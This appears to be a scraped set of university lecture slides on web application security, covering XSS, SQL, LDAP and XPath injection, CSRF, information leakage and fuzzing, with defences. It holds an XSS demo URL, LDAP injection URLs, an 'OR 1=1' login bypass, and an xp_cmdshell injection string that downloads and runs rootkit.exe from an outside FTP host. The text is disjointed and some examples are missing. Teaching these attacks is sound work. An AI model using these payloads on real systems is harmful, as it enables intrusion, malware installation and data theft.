Académique Documents
Professionnel Documents
Culture Documents
Cross site scripting attack (CSS or XSS) creating a malicious script on one site that runs in the browser to compromise user data.
Demo:
http://www.tipicalcharlie.com/index.cfm?search=%3Cscript%3Ealert%28window.location%29%3B%3C%2Fscript%3E
Injection flaws
- Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application. - In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.
Injection flaws
Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.
Injection flaws
How to protect users: Avoid using interpreters if possible. If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries.
Injection flaws
SQL Injection Attack When user input is used in an SQL query and the user input is not validated, the SQL server can be attacked. Often the data for dynamically produced web pages is stored in an SQL database. The data is retrieved using SQL and added to static information to display to the web user. Most E-commerce applications use this model. User information is stored in a database along with the product catalog, user orders, order status, etc.
SQL Injection
Consider the following VBScript query:
Query1 = INSERT INTO Records (Name, CardNum) VALUES ( & Request.Form(Username) & , & Request.Form(CreditCard) & )
This query takes several inputs from forms filled in by the user. Normally CardNum would contain a credit card number like, 560545334506. However, if a crafted CardNum was entered and no input validation is done, the query could be hijacked as follows:
Query1 = INSERT INTO Records (Name, CardNum) VALUES ( Username , 1); EXEC xp_cmdshell echo open
111.22.3.45 4444 > o& echo get rootkit.exe>>o&echo bye>>o&ftp i n s:o&rootkit.exe)) If this SQL server were running on Windows, the above crafted string would result in the SQL server downloading the file, rootkit.exe, from the ftp site at 111.22.3.45 and executing rootkit.exe.
SQL Injection
Other attack approaches of this type include modifying the SQL to return the password table for the database, altering the sa account password or creating an admin level account with a password of the attackers choosing. The attacker may also use the sa account to alter web pages so the attacker can steal user credentials when they login. To prevent this kind of attack, the user input must be stripped of characters and strings that could be malicious. The input validation should be done on the server side, since client side validation could be bypassed.
SQL Injection
Authentication Bypass Exploit:
Consider a login form that accepts username and password and then executes the following SELECT to check the credentials: SELECT * FROM tblUsers WHERE username = jeff AND password =Trickey However, what if the user entered something besides a password in that input form, and instead entered an SQL command? Username: jeff Password: x OR 1=1
SQL Injection
Authentication Bypass Exploit:
The application might then create a SQL statement such as the following: SELECT * FROM tblUsers WHERE username = jeff AND password = x OR 1 = 1
Injection attacks are an attempt by an attacker to manipulate query data to modify query logic for malicious purposes. In this instance, a true condition has been included instead of a valid password, effectively bypassing the authentication mechanism and giving the attacker unauthorized access to the application.
Injection Attacks
Any other query or command language that accepts user input can also be susceptible to injection attacks. LDAP, JavaScript, XPath, Command Shellsas long as they accept unsanitized user input, they can be exploited.
LDAP Injection
Suppose there is a web interface to do ldap searches for Names, email addresses and telephone numbers. A normal URL might be: http://tim.ncsu.edu/ldap-search.asp?user=amridgley
User information for: Amber Ridgley Cn: Amber Ridgley Mail: amridgley@ncsu.edu TelephoneNumber: 919-555-4242
LDAP Injection
In the ldap-search.asp function, the real query is: http://tim.ncsu.edu/ldap-search.asp?user=amridgley
userName=amridgley Filter = (uid=amridgley) Search ou=people,dc=tim,dc=ncsu.edu Ldap search filter = (uid=amridgley) Ldap search attributes = cn, mail, telephoneNumber Note: The filter is uid = user_supplied_value
LDAP Injection
To find out if your application is vulnerable, an attacker might send these URLs: http://tim.ncsu.edu/ldap-search.asp?user=amridgley) http://tim.ncsu.edu/ldap-search.asp?user=amridgley| http://tim.ncsu.edu/ldap-search.asp?user=amridgley%26
If the application doesnt return an error, but simply returns no data, the attacker knows there is no validation being done.
LDAP Injection
Next an attacker might try to get more data than the application is supposed to return: http://tim.ncsu.edu/ldap-search.asp?user=amridgley)(|(objectclass=*)
User information for : top Objectclass : top :person :organizationalPerson :uid :uidnumber :gidnumber :posixAccount
LDAP Injection
posixAccount objectclass could contain interesting information. http://tim.ncsu.edu/ldap-search.asp?user=amridgley)(|(homedirectory=*) User information for : /home/amridgley homedirectory: /home/amridgley
XPath Injection
Suppose there is an application displaying a catalog of parts:
XPath Injection
The XML contains: <products> <product catalogNumber=aaa123> <name>Blue Sprocket</name> <price>4.00</price> <cost>1.50</cost> </product> </products> So the XPath search is: /products[product catalogNumber = aaa123]
XPath Injection
To determine that an application is vulnerable to XPath injection, the first step is to append information to the Part Number that is always true.
The fact that the application still returned valid data is evidence that the application accepted the additional information and processed it as part of the query.
XPath Injection
Next an attacker enters a query that will always be false:
Since the query clause 1 = 2 will never be true, this query returns no results. The attacker now knows what the applications response will be in answer to a false question as well as a true question. Now he can ask any question he wants and understand the answer.
XPath Injection
So, to determine the number of nodes in the data, an attacker might try this:
If the response is the true response, the number of nodes is 2. If it is false, try again with node = 3 and keep guessing from there.
As you can see, an attacker can determine the structure of the data and view it by adding XPath commands to the part number.
XPath does not utilize access control restrictions as SQL does via privileges, so a successful XPath Injection attack can yield complete results in that all the data in the document will be revealed.
What happens if you GET the URL above and then change it to: https://submit.ncsu.edu/wrap-bin/submit_admin/csc:405::001:8:2007 ?? Can you access the submit locker for classes where you are not on the support list?
Cross site request forgery How to protect users: Dont rely on credentials or tokens automatically submitted by browsers. The only solution is to use a custom token that the browser will not remember.
Problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the programs configuration and internal workings.
Information Leakage
How to protect users: Use a testing tool such as OWASPS WebScarab Project to see what errors your application generates. Applications that have not been tested in this way will almost certainly generate unexpected error output.
Information Leakage
How to protect users: Use a fuzzing tool.
Fuzzing is an automated software testing technique that generates and submits random or sequential data to various areas of an application in an attempt to uncover security vulnerabilities.
Fuzzing
Fuzzing can be used to test variations of input such as:
resource path resource file resource file extension resource and query delimiter parameter name parameter name value assignment parameter value parameter separator /folder/file.html /folder/file.html /folder/file.html /folder/file.html?parameter=value /folder/file.html?parameter=value /folder/file.html?parameter=value /folder/file.html?parameter=value /folder/file.html?parameter=value¶meter2=value2
Fuzzing
Fuzzers can also vary the: Method Request-URI Protocol version Header Fields Cookies
Information Leakage
If an attacker sends a crafted SQL query to a database server, they can often learn the name of the script and then use that information in an attack. The error could also reveal the path to the scripts directory which is also needed for a successful attack.
Information Leakage
Another common method employed for mapping the web server file space is to craft URLs to see if the server will output a different error when a file exists, but is not permitted to be viewed versus the file doesnt exist at all. For example, if the server outputs access denied for a file that exists, but isnt supposed to be viewed, versus file not found if the file really isnt there, the attacker can craft URLs to determine what directory stores a given file that may be vulnerable.
Problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.
Cookies
HTTP is a stateless protocol. Cookies are used to record the state of a connection between client and server across several HTTP requests. Instead of the server trying to track the connection state, the server provides cookie data for the client to store. The server specifies the cookie name.
Cookies
The cookie size is limited to 4kb. The server may store some information on the server side and the cookie maybe some type of index into the server session information. Cookies are associated with a domain. A cookie created by server1.yahoo.com can be accessed by server5.yahoo.com because they have the same root domain.
These flaws can lead to disclosure of sensitive data and compliance violations if database tables are dumped or data leakage occurs in a URL or error message.
Insecure Communications
Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable pricechecking devices, cash registers and store computers.
Insecure Communications
How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.